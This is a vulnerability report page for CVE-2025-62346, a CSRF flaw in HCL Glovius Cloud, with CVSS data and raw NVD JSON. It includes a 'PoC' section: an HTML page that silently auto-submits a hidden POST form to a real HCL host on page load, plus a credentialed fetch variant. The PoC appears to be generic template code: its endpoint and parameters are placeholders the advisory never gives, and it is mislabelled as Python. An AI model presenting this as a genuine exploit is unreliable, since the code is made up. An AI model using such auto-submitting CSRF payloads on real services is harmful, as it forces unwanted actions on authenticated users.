Security Vulnerability Report
中文
CVE-2025-62346 CVSS 6.8 MEDIUM

CVE-2025-62346

Published: 2025-11-20 15:17:39
Last Modified: 2026-04-15 00:35:42

Description

A Cross-Site Request Forgery (CSRF) vulnerability was identified in HCL Glovius Cloud. An attacker can force a user's web browser to execute an unwanted, malicious action on a trusted site where the user is authenticated, specifically on one endpoint.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HCL Glovius Cloud (特定版本,待官方确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62346 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62346</title> </head> <body> <h2>CVE-2025-62346 CSRF PoC</h2> <p>This PoC demonstrates the CSRF vulnerability in HCL Glovius Cloud.</p> <form id="csrfForm" action="https://glovius.hcl.com/api/target-endpoint" method="POST" style="display:none;"> <!-- Malicious parameters --> <input type="hidden" name="action" value="malicious_action" /> <input type="hidden" name="data" value="exploit_data" /> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); // Alternative: Using Fetch API /* fetch('https://glovius.hcl.com/api/target-endpoint', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=malicious_action&data=exploit_data' }); */ </script> <p>If you see this message, the attack has been executed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62346", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.673", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) vulnerability was identified in HCL Glovius Cloud. An attacker can force a user's web browser to execute an unwanted, malicious action on a trusted site where the user is authenticated, specifically on one endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0126459", "source": "[email protected]"}]}}